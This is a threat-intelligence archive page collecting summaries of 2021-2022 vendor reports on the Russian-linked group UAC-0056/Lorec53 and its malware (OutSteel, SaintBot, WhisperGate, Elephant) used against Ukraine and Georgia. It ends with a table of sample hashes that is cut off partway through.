href="https://contagio.deependresearch.org/read/Nodaria_2022_Spear_Phishing_Attacks_Target_Organizations_in_Ukraine%2C_Payloads_Include_the_Document_Stealer_OutSteel_and_the_Downloader_SaintBot.pdf">https://contagio.deependresearch.org/read/Nodaria_2022_Spear_Phishing_Attacks_Target_Organizations_in_Ukraine%2C_Payloads_Include_the_Document_Stealer_OutSteel_and_the_Downloader_SaintBot.pdf</a> </div><div style="text-align: left;"><br /></div></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><b>Summary:</b></div></div></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><div>The threat group UAC-0056 is targeting government organizations and companies involved with critical infrastructure in Ukraine and other countries. Their primary goal is to steal sensitive information for situational awareness and leverage in dealing with Ukraine.</div><div><br /></div><div>The initial loader Trojan is used as a simple wrapper for the next few stages.</div><div><br /></div><div>The packer used to pack and obfuscate the initial loader allows cloning .NET assemblies from other binaries and certificates.</div><div><br /></div><div>The decrypted DLL, named SHCore2.dll, is obfuscated.</div><div><br /></div><div>The stager contains anti-analysis functionality, including checks to refuse to execute inside a virtual machine or on bare metal systems.</div><div><br /></div><div>The stager will decrypt and execute a total of four embedded binaries.</div><div><br /></div><div>OutSteel is a file uploader and document stealer developed with the scripting language AutoIT. It searches for files with specific extensions and uploads them to a hardcoded command and control server.</div><div><br /></div><div>The Windows_defender_disable.bat is used to disable Windows Defender functionality.</div><div><br /></div><div>The SaintBot .NET Loader is composed of several stages with varying levels of obfuscation.</div><div><br /></div><div>The SaintBot Payload is capable of downloading further payloads and updating itself on disk.</div><div><br /></div><div>The threat actors use different social engineering themes in their attacks, such as cryptocurrency, COVID, law enforcement, and fake resumes.</div><div><br /></div><div>Email is used as the attack vector, and different infection chains are used to compromise systems.</div><div><br /></div><div>The threat group has overlaps with previous attack campaigns focused on other organizations in Ukraine and Georgia, as well as other nations’ assets local to Ukraine.</div><div><br /></div><div>The attackers used Discord’s content delivery network (CDN) to host the payload.</div><div><br /></div><div>The threat group makes use of several hardcoded command and control (C2) servers, all reaching out to the same endpoint.</div></div></div></div></blockquote><p> </p><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><b>2022-02-21<span style="white-space: pre;"> </span><a href="https://nsfocusglobal.com/apt-lorec53-group-launched-a-series-of-cyber-attacks-against-ukraine/">NSFocus - APT Lorec53 group launched a series of cyber attacks against Ukraine</a></b></div><div style="text-align: left;">PDF:<span style="white-space: pre;"> </span><a href="http://contagio.deependresearch.org/read/Nodaria_2021_APT+Lorec53+group+launched+a+series+of+cyber+attacks+against+Ukraine+-+NSFOCUS.pdf">http://contagio.deependresearch.org/read/Nodaria_2021_APT+Lorec53+group+launched+a+series+of+cyber+attacks+against+Ukraine+-+NSFOCUS.pdf</a></div><div style="text-align: left;"><br /></div></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;">Summary:</div></div></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><p style="text-align: left;"> A new APT group named Lorec53 was identified by NSFOCUS Security Labs and confirmed by the Ukrainian Computer Emergency Response Center (UAC-0056).</p><p>Lorec53 is active in Eastern Europe and has been involved in large-scale cyber espionage attacks against Ukraine and Georgia.</p><p>The group has strong infiltration ability and flexible attack methods, using phishing attacks and social engineering techniques.</p><p>Lorec53 targets key state sectors such as the Ministry of Defense, Ministry of Finance, embassies, state-owned enterprises, and public medical facilities to collect personnel information.</p><p>The group has Russian-linked characteristics in attack tools, domain names, and asset location.</p><p>Victims of the Lorec53 group include the National Bank of Iran, Georgia’s Ministry of Epidemic Prevention and Health, Ukraine’s Ministry of Defense, Presidential Office, Ministry of the Interior, and Border Service.</p><p>A recent long wave of attacks from Lorec53 targeted a wide range of victims using baits such as Ukrainian government documents, shortcut files, and cpl files.</p><p>The group used 3 domain names (3237.site, stun.site, and eumr.site) as download servers for phishing files.</p><p>Lorec53 employed known Trojan programs including LorecDocStealer (OutSteel), LorecCPL, and SaintBot.</p><p>The first phishing attack in this wave used phishing documents referring to a presidential decree and the second attack used PDF and DOCX files with malicious macros.</p><p>The third attack used a phishing document in .zip format targeted at the Ukrainian medical system.</p><p>The main purpose of these attacks is still information gathering and the TTPs of the Lorec53 group are evident at each stage.</p></blockquote><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><b>2022-02-16<span style="white-space: pre;"> </span><a href="https://www.telsy.com/babadeda-and-loreccpl-downloaders-used-to-run-outsteel-against-ukraine/" target="_blank">Telsy - DriveSlayer, FoxBlade, KillDisk.NCV, BabaDeda and LorecCPL downloaders used to run Outsteel against Ukraine</a><span style="white-space: pre;"> </span></b><span style="white-space: pre;"> </span></div><div style="text-align: left;">PDF: <span style="white-space: pre;"> </span><a href="http://contagio.deependresearch.org/read/Nodaria_2022_BabaDeda_and_LorecCPL_downloaders_used_to_run_Outsteel_against_Ukraine_Telsy.pdf">http://contagio.deependresearch.org/read/Nodaria_2022_BabaDeda_and_LorecCPL_downloaders_used_to_run_Outsteel_against_Ukraine_Telsy.pdf</a></div><div style="text-align: left;"><br /></div></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><b>Summary:</b></div></div></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><div>Threat Campaign: Spear-phishing emails with malicious attachments used to steal files from victims' machine.</div><div>Malware: Infostealer "OutSteel" that uploads stolen files to a Command and Control server. Downloader used to load OutSteel is the BabaDeda crypter.</div><div>Threat Actor: State-sponsored group "Lorec53" (as named by NSFocus), suspected of being employed by high-level espionage organizations to target government employees in Georgia and Ukraine.</div><div>TTPs:</div><div>BabaDeda Crypter is an evasive malware that acts as an installer and executes a shellcode stored encrypted in a file (xml or pdf).</div><div>The first stage of the attack is downloading the BabaDeda crypter from a malicious LNK file or WORD template document.</div><div>The BabaDeda crypter first loads and runs a malicious DLL, which then loads and executes another malicious DLL in another thread.</div><div>The first DLL reads and parses the shellcode and writes it in the main binary's text section.</div><div>The decrypted shellcode extracts the loader shellcode and the payload, then decrypts them and transfers execution to the decrypted loader shellcode.</div><div>The final payload is OutSteel, which exfiltrates stolen documents to a specified URL.</div><div>The second malicious library is a mere downloader that downloads the next stage of the attack.</div><div><br /></div><div>BabaDeda Crypter</div><div>LorecCPL downloaders</div><div>Outsteel Infostealer</div><div>TTPs (Tactics, Techniques, and Procedures):</div><div><br /></div><div>Persistence achieved by creating a link file in the start-up directory using the IShellLinkW interface</div><div>Payload execution after decryption</div><div>Self-deletion routine</div><div>File size checking before execution</div><div>Downloading and running the next stage in a new process</div><div>Code overlap with WhisperGate malware</div><div>Hosting the archive on Discord</div><div>Using CPL files to trick uneducated users into executing the malware</div><div>Using xor decryption to hide the real code</div><div>Putting arguments on the stack and using them in functions</div><div>Downloading the final payload from a URL</div><div>Packing the final payload with ASProtect</div><div>Exfiltrating documents to a C2 server</div></div></div></div></blockquote><p><b>2022-02-08 <a href="https://nsfocusglobal.com/apt-retrospection-lorec53-an-active-russian-hack-group-launched-phishing-attacks-against-georgian-government/" target="_blank">NSFocus - Apt Retrospection: Lorec53, An Active Russian Hack Group Launched Phishing Attacks Against Georgian Government</a></b><a href="https://nsfocusglobal.com/apt-retrospection-lorec53-an-active-russian-hack-group-launched-phishing-attacks-against-georgian-government/" target="_blank"> </a><br />PDF: <a href="https://s3.amazonaws.com/contagio.deependresearch.org/read/Ember_Bear_2022_APT_Retrospection__Lorec53%2C_An_Active_Russian_Hack_Group_Launched_Phishing_Attacks_Against_Georgian_Government.pdf">https://contagio.deependresearch.org/read/Ember_Bear_2022_APT_Retrospection__Lorec53%2C_An_Active_Russian_Hack_Group_Launched_Phishing_Attacks_Against_Georgian_Government.pdf</a></p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><p style="text-align: left;"><b>Summary:</b></p></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><p>In July 2021, a phishing campaign was discovered targeting Georgian government officials and using current political issues to create bait for specific victims.</p><p>The campaign utilized phishing documents named "828-ში ცვლილება.doc" and "დევნილთა 2021-2022 წლების სტრატეგიის სამოქმედო გეგმა.doc" to lure victims into enabling the editing feature of Office and executing malicious macros.</p><p>The malicious macros created a C# Dropper Trojan that downloaded and executed an AutoIt executable doc, a customized Trojan designed to steal various document-typed files from the victim's computer.</p><p>The attacker, tentatively named Lorec53, has been linked to a similar phishing campaign against the Ukrainian government in April 2021.</p><p>The attacker is believed to be a Russian hacking group that uses known generation tools to build the attack process and has a bias toward espionage operations.</p><p>The attacker controls a large amount of attack resources in the Russian network domain and has been found to conduct long-term vulnerability scanning activities.</p></blockquote><p> </p><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><b>2022-01-19<span style="white-space: pre;"> </span><a href="https://www.elastic.co/security-labs/operation-bleeding-bear" target="_blank">Elastic - Operation Bleeding Bear<span style="white-space: pre;"> </span></a><span style="white-space: pre;"> </span></b></div><div style="text-align: left;">PDF: <span style="white-space: pre;"> </span><a href="http://contagio.deependresearch.org/read/Emberbear_Saintbear_2022_Operation+Bleeding+Bear_Elastic.pdf">http://contagio.deependresearch.org/read/Emberbear_Saintbear_2022_Operation+Bleeding+Bear_Elastic.pdf</a></div><div style="text-align: left;"><br /></div></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><b>Summary:</b></div></div></div></blockquote><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"></div></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><div><br /></div><div>WhisperGate MBR payload: Tampering with the Master Boot Record (MBR) to render the system inoperable. The ransomware note is stored in a buffer that is written over the MBR.</div><div>Discord downloader and injector: After gaining a foothold, the stage 2 binary downloads and launches a payload via Discord, which then launches a number of events such as adding Windows Defender exclusion, stopping Windows Defender, and deleting the Windows Defender directory.</div><div>File corruptor: The file corruptor payload is loaded in memory via process hollowing and targets any local hard drives, attached USB drives, or mounted network shares. The file corruptor scans directories for files matching specific extensions, overwrites the start of each file with 1MB of static data, renames each file with a randomized extension, and deletes itself.</div><div> </div></div></div></div></blockquote><p> </p><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><b>2022-01-17<span style="white-space: pre;"> </span></b><b><a href="https://www.picussecurity.com/resource/blog/dev-0586-apt-group-in-whispergate-attack-targeting-ukraine" target="_blank">Picusecuirty - TTPs used by DEV-0586 APT Group in WhisperGate Attack Targeting Ukraine<span style="white-space: pre;"> </span></a></b></div><div style="text-align: left;">PDF: <span style="white-space: pre;"> </span><a href="http://contagio.deependresearch.org/read/DEV-0586_2022_TTPs_used_by_DEV-0586_APT_Group_in_WhisperGate_Attack_Targeting_Ukraine_Picusecurity.pdf">http://contagio.deependresearch.org/read/DEV-0586_2022_TTPs_used_by_DEV-0586_APT_Group_in_WhisperGate_Attack_Targeting_Ukraine_Picusecurity.pdf</a><span style="white-space: pre;"> </span></div><div style="text-align: left;"><br /></div></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><b>Summary:</b></div></div></div></blockquote><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"></div></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;">The DEV-0586 APT group targeted Ukrainian organizations with WhisperGate wiper malware.</div><div style="text-align: left;">WhisperGate is a two-stage wiper malware that masquerades as ransomware. The initial access stage is unknown, but it is suspected to be a supply chain attack.</div><div style="text-align: left;">In its first stage, WhisperGate overwrites the Master Boot Record (MBR) with a fake ransom note, making the infected system unable to boot up.</div><div style="text-align: left;">In its second stage, WhisperGate corrupts files with certain extensions by overwriting them and renaming them with a random four-byte extension.</div><div style="text-align: left;">DEV-0586 uses the following TTPs in their WhisperGate campaign:</div><div style="text-align: left;">Execution: The first stage uses Windows Command Shell and the second stage uses PowerShell to connect to its Command and Control server.</div><div style="text-align: left;">Defense Evasion & Persistence: WhisperGate modifies the MBR to evade defense and deliver its payload in Base64 encoding.</div><div style="text-align: left;">Discovery: The second stage searches for specific file extensions in certain directories.</div><div style="text-align: left;">Command and Control: The second stage downloads file corruptor payload from a Discord channel hosted by the APT group.</div><div style="text-align: left;">Impact: WhisperGate overwrites the MBR and files, affecting their integrity.</div></div></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><br /></div></div></div></blockquote><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><b>2022-01-16<span style="white-space: pre;"> </span><a href="https://twitter.com/ncsccUA/status/1482733473228013569?s=20">UACERT - Operation Bleeding Bear</a><span style="white-space: pre;"> </span><span style="white-space: pre;"> </span></b></div><div style="text-align: left;">PDF: <span style="white-space: pre;"> </span><a href="http://contagio.deependresearch.org/read/BleedingBear_2022_UACert_twitter.pdf">http://contagio.deependresearch.org/read/BleedingBear_2022_UACert_twitter.pdf</a><br /><br /><br /></div><div style="text-align: left;"><b>2022-01-15<span style="white-space: pre;"> </span><a href="https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine" target="_blank">Bitdefender - Deep Dive into the Elephant Framework – A New Cyber Threat in Ukraine</a></b></div><div style="text-align: left;">PDF:<span style="white-space: pre;"> </span><a href="http://contagio.deependresearch.org/read/Nodaria_2022_Deep+Dive+into+the+Elephant+Framework+%E2%80%93+A+New+Cyber+Threat+in+Ukraine_Bitdefender.pdf">http://contagio.deependresearch.org/read/Nodaria_2022_Deep+Dive+into+the+Elephant+Framework+%E2%80%93+A+New+Cyber+Threat+in+Ukraine_Bitdefender.pdf</a></div><div style="text-align: left;"><br /></div></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><b>Summary:</b></div></div></div></blockquote><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"></div></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><div>The Elephant malware is a threat group associated with pro-Russian cyber attacks, primarily focused on cyber espionage with a focus on key state sectors in Ukraine. The group, also known as UAC-0056, Lorec53, UNC2589, EmberBear, LorecBear, BleedingBear, SaintBear, and TA471, has been active since at least March 2021. The malware is part of the Elephant Framework, a collection of tools written in the Go language and deployed in recent phishing attacks on .gov.ua targets.</div><div><br /></div><div>The Elephant Framework uses the spear-phishing tactic for initial compromise, with emails originating from spoofed Ukrainian email addresses and using social engineering techniques. The launcher component, written in Go language or Python, downloads the malware payload and establishes persistence. The downloader component, Java-sdk.exe, also written in Go, is responsible for downloading the Elephant Framework, which includes two components: GrimPlant, a backdoor that allows remote execution of PowerShell commands, and GraphSteel, a stealer used for data exfiltration of credentials, certificates, passwords, and other sensitive information.</div><div><br /></div><div>GraphSteel exfiltrates information using WebSockets and the GraphQL query language, with all communication encrypted using the AES cipher. The malware runs a heartbeat routine every 20 seconds and an exfiltration routine every 20 minutes, exfiltrating files from designated folders and harvests credentials from various sources.</div><div><br /></div><div>In one reported phishing campaign, the malware deployed a parallel deployment of Cobalt Strike Beacon, which downloads another executable from Discord. The C&C server used by the Elephant Framework is different from the one used by the Cobalt Strike Beacon.</div></div></div></div></blockquote><p> </p><p><b>2021-04-06<span style="white-space: pre;"> </span><a href="https://www.malwarebytes.com/blog/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader" target="_blank">Malwarebytes - A deep dive into Saint Bot, a new downloader</a></b><br />PDF:<span style="white-space: pre;"> </span><a href="http://contagio.deependresearch.org/read/Nodaria_2022_A_deep_dive_into_Saint_Bot%2C_a_new_downloader.pdf">http://contagio.deependresearch.org/read/Nodaria_2022_A_deep_dive_into_Saint_Bot%2C_a_new_downloader.pdf</a></p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><p style="text-align: left;"><b>Summary:</b></p></blockquote><p></p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><p style="text-align: left;">In March 2021, Malwarebytes analysts discovered a phishing email that contained a zip file with unfamiliar malware.</p></div></div>The malware was a PowerShell script disguised as a link to a Bitcoin wallet, which led to the download of a lesser-known malware called Saint Bot. Saint Bot is a downloader that can be used to distribute various types of malware and is being actively developed.<br />The malware is distributed through phishing emails with a zip attachment that lures victims with the promise of accessing a Bitcoin wallet.</blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"> </blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;">The malware employs a variety of techniques, including obfuscation and anti-analysis techniques, process injection, and command and control infrastructure and communication.<br />The initial malware is a .NET downloader that carries another .NET binary in its resources.<div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><p style="text-align: left;">The second .NET binary is responsible for downloading and deploying two executables, one that disables Windows Defender and another that is the main payload. The main payload is heavily obfuscated and sets up persistence by installing itself in the startup directory and creating a new </p></div></div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><p style="text-align: left;">The content sent to/from the C2 is obfuscated using an algorithm that is different from the one used to obfuscate internal strings.</p></div></div></blockquote><p><b>2021-11 <a href="https://nsfocusglobal.com/wp-content/uploads/2021/11/Analysis-Report-on-Lorec53-Group.pdf" target="_blank">NSFocus - 2021 Analysis Report on Lorec53 Group </a><br /></b>PDF: <a href="https://s3.amazonaws.com/contagio.deependresearch.org/read/EmberBear+_2021_-Lorec53-Group+(1).pdf">https://s3.amazonaws.com/contagio.deependresearch.org/read/EmberBear+_2021_-Lorec53-Group+(1).pdf</a></p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><p style="text-align: left;"><b>Summary:</b></p></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><p>A new APT group called Lorec53 has been identified by NSFOCUS Security Labs, targeting Eastern European countries like Ukraine and Georgia with espionage attacks against government workers.</p><p>Lorec53 uses a variety of social engineering techniques, such as phishing attacks, watering hole sites, and lnk script execution, along with temporary domain names like .site, .space, .xyz, and others.</p><p>The group has acted like a mercenary hacker group by using the attack methods and network facilities of other hacker groups to launch unique downloaders and spy Trojan programs.</p><p>Lorec53's attack payloads include Trojan horse programs like LorecCPL and LorecDocStealer, which have not been seen in other spying activities.</p><p>The group prefers to use attack resources from Russia, such as servers owned by Russian service providers and registrants and Trojan horse programs from Russian hacker forums or black markets.</p><p>The group's phishing attacks involve fake documents with malicious macros that download and run the LorecDocStealer Trojan, and fake download pages disguised as Adobe Acrobat DC readers, among others.</p><p>Lorec53 has also used fake websites, including a fake website for the President of Ukraine, to lure people in and send them malware.</p><p>The group is suspected to have been behind a phishing campaign that targeted Iran's Android app, using watering hole sites and an Android Trojan called Pardakht to steal SMS messages from Iranian cell phone users.</p></blockquote><div style="text-align: left;">
<div>
<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;">
<span style="font-family: verdana;">Hashes</span>
</div>
<div><div style="background-color: white;"><span style="font-family: verdana;"><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Detailed Hash information:</div>
<iframe class="airtable-embed" frameborder="0" height="533" onmousewheel="" src="https://airtable.com/embed/shrZ3MBZvYclXax5H?backgroundColor=purpleLight&viewControls=on" style="background: transparent; border: 1px solid #ccc;" width="100%"></iframe>
<div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><div class="samplearea" style="border: 0px; color: #1c1c1c; font-family: Raleway, Helvetica, Arial, sans-serif; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 0px 0px 2em; padding: 0px; text-align: center; vertical-align: baseline;"><table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); font-family: Arial, Helvetica, sans-serif; margin: 0px auto;"><thead><tr class="tableizer-firstrow"><th style="background-color: #1a8b2a; color: white; text-align: left;">MD5</th><th style="background-color: #1a8b2a; color: white; text-align: left;">SHA1</th><th style="background-color: #1a8b2a; color: white; text-align: left;">SHA256</th></tr></thead><tbody><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">28f18fc7d9a0ab530742c2314cbd5c32</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">81670ac52bd2356148406e1a6dae97581cb24f99</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8409920ef2d78549fc214718c4719d3a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">37cb1ee7842cf73cb9c1eb98a12aad7b6a78b705</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e68c83ce6359691ce63c957ebfdbf959c5b199c83fd2480aebe4220fec9f3304</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c73d42d7546fe049f63115635c092288</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">da568ee6037959967ea4d5a879c66222d9dff06a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">73e1f2762ffe8e674f08d83c1308362bd96ccd4f64c307ee0a568bc66faf45bb</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">23cf0517359c014a8d25085eceb2cb25</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">23cf0517359c014a8d25085eceb2cb25</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f3f43f3f4d55c0382f9045fd8093eef66074ca7d97dad066746ace47cc47319a</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">36ff9ec87c458d6d76b2afbd5120dfae</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"> 9a3161c8570f1ca410038bed6e2aa297aebaf548</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8ffe7f2eeb0cbfbe158b77bbff3e0055d2ef7138f481b4fac8ade6bfb9b2b0a1</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">06124da5b4d6ef31dbfd7a6094fc52a6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"> 265a613ac405e6c3557e36a19f0ead2d18638cb0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9e9fa8b3b0a59762b429853a36674608df1fa7d7f7140c8fccd7c1946070995a</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b8b7a10dcc0dad157191620b5d4e5312</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"> ff37d700d76cb6ed7d123f33362f5017136d1c08</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b5b989f8eab271b63d8ab96d00d5fb5c41ab622e6cfde46ea62189765326af5a</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6b413beb61e46241481f556bb5cdb69c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"> 189f1879fcac60030dd3a751daae46a7444245ff</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c83d8b36402639ea3f1ad5d48edc1a22005923aee1c1826afabe27cb3989baa3</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4a5de4784a6005aa8a19fb0889f1947a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"> a20b0724746a742bf1ea14e6c9571fa6aa29e022</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">99a2b79a4231806d4979aa017ff7e8b804d32bfe9dcc0958d403dfe06bdd0532</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">aafe14a65c2198e6f70174c620760645</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d0f1518db54f280dde5008404a2750641e76ceb2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c8e3869f431937f4db3bbb34b0bb4afa3d7e6982d43e81ee840382eeb5525ab2</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">563ccff9d1021076a12176ae49404d32</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f9d5b4cd52b42858917a4e1a1a60763c039f8930</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a318fbaddaa11df5edde620b4c45ff31316dcfadf085d0f862004c857be568d7</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">da305627acf63792acb02afaf83d94d1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"> b4100aad572f619632ec28042a76c52ba2350acc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c1afb561cd5363ac5826ce7a72f0055b400b86bd7524da43474c94bc480d7eff</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3bfb04e40b548d58ea3a9c8c82aae205</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ba9cea9ae60f473d7990c4fb6247c11c080788d3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c73a1f1ff53e50e07cd654b2296139747c2c0394ce507de88b2d7a1248b8ac25</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7052d63610b063c859af7f128a0c05cd</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7d44391b76368b8331c4f468f8ddbaf6ee5a6793</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6e3917257f9239ff1c0ec0c17a7d9b6b01dead526c56218a11b0676174440112</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1c09d7e1f5d2a7ee08a630bb22ade850</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3a0a4e711c95e35c91a196266aeaf1dc0674739d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">449a8f555ab4ec871612374f638076ad4a7d8d6d628beaaf6799fa7723f9e40a</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">28267ea322e3975f1e98c64a1c77f509</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e1d92e085df142d703ed9fd9c65ed92562a759fa</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">18f24841651461bd84a5eac08be9bce9eab54b133b0e837d5298dac44e199d5f</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c3c04682c9b03439f022af6052c7c1a8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0d94bac4c4df1fe3ad9fd5d6171c7460b30d8203</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ef6f02c41b4bad58fc1930d0ed00a5db1e122b89bc2782ba4dbdc785bc07dba0</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">cb5e37a1c74b3cd1e4008fd3ee4ef613</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">66117493eed35fbd3824e35971b0919190cd1de7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">92767e39f24f845c9a12fb44035eda7f801560f8285d7435e82d6c57c059cd83</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">26e326ba69f5258c4979902b5bd4f24e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d6e4d803b1062b4f55c1cef61e5a517dd98cd4b7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9dec13e1b0ed9337fcbe233d5f83eff09c64a14c7f2400b9b915a685b29612ea</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">aa5e8268e741346c76ebfd1f27941a14</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a6772c80f51d3805d5704f02a80e08501b133fac</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 